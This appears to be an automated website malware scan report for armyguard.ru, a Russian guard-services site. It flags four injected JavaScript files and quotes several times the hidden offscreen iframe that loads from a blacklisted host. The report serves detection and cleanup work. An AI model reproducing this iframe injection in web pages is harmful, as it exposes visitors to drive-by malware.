Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=armyguard.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://armyguard.ru/ | 200 OK Content-Length: 15608 Content-Type: text/html | clean |
http://armyguard.ru/dogovor-na-okazanie-ochrannich-uslug-dogovor-ochrannich-uslug | 200 OK Content-Length: 16521 Content-Type: text/html | clean |
http://armyguard.ru/vakansii | 200 OK Content-Length: 11815 Content-Type: text/html | clean |
http://armyguard.ru/stoimost-ochrannich-uslug | 200 OK Content-Length: 17427 Content-Type: text/html | clean |
http://armyguard.ru/otzivi | 200 OK Content-Length: 14746 Content-Type: text/html | clean |
http://armyguard.ru/litsenzii | 200 OK Content-Length: 14045 Content-Type: text/html | clean |
http://armyguard.ru/modules/mod_jt_slideshow/scripts/jquery.js | 200 OK Content-Length: 57456 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: oktafya.wikaba.com ...[59433 bytes skipped]... |document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"></iframe>'); Malicious iFrame found. size: 100x100 src: http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11 This URL is marked by Google as suspicious <iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"> | ||
http://armyguard.ru/modules/mod_jt_slideshow/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 29031 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[28185 bytes skipped]... ount||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 100x100 src: http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11 This URL is marked by Google as suspicious <iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"> | ||
http://armyguard.ru/kontakti | 200 OK Content-Length: 12724 Content-Type: text/html | clean |
http://armyguard.ru/components/com_ckforms/js/calendar.js | 200 OK Content-Length: 16030 Content-Type: application/x-javascript | malicious |
Page code contains blacklisted domain: oktafya.wikaba.com ...[15919 bytes skipped]... =E&&!B.contains(I)){return I}})}else{H=[];for(var C=G;C<=E;C++){if(!B.contains(C)){H.push(C)}}}H.sort(this.sort);return{days:H,months:A,years:D}},write:function(A){this.rebuild(A);A.els.each(function(B){B.value=this.format(A.val,B.format)},this)}});Calendar.implement(new Events,new Options); ;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"></iframe>'); Malicious iFrame found. size: 100x100 src: http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11 This URL is marked by Google as suspicious <iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"> | ||
http://armyguard.ru/components/com_ckforms/js/formcheck.js | 200 OK Content-Length: 30607 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[21748 bytes skipped]... function(el) { if(!this.manageError(el,'submit')) this.form.isValid = false; }, this); (this.form.isValid) ? (this.options.submitByAjax) ? this.submitByAjax() : this.form.submit() : this.focusOnError(this.firstError); } }); FormCheck.implement(new Options());;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"></iframe>'); Antivirus reports:
Malicious iFrame found. size: 100x100 src: http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11 This URL is marked by Google as suspicious <iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://oktafya.wikaba.com/300562b45445b2992c71407042f73dff.pip?11"> | ||
http://armyguard.ru/ochrana-zhilich-domov | 200 OK Content-Length: 12229 Content-Type: text/html | clean |
http://armyguard.ru/ochrana-avtopredpriyatiy/ochrana-avtopredpriyatiy-avtoservisov-avtostoyanok-parkovok-i-avtozapravochnich-stantsiy | 200 OK Content-Length: 11463 Content-Type: text/html | clean |
http://armyguard.ru/ochrana-ofisov-v-moskve | 200 OK Content-Length: 12356 Content-Type: text/html | clean |
http://armyguard.ru/ochrana-magazinov-torgovich-tsentrov | 200 OK Content-Length: 12314 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: armyguard.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 19:57:18 GMT
Pragma: no-cache
Server: nginx/Zenon
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 27 Jun 2014 19:57:18 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 36b47f348ec1213be68e7a2400489069=tujpler96063uhhkq9kvb26vj6; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: armyguard.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 27 Jun 2014 19:57:18 GMT
Pragma: no-cache
Server: nginx/Zenon
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 27 Jun 2014 19:57:18 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 36b47f348ec1213be68e7a2400489069=tujpler96063uhhkq9kvb26vj6; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: armyguard.ru
Referer: http://www.google.com/search?q=armyguard.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: armyguard.ru
Referer: http://www.google.com/search?q=armyguard.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.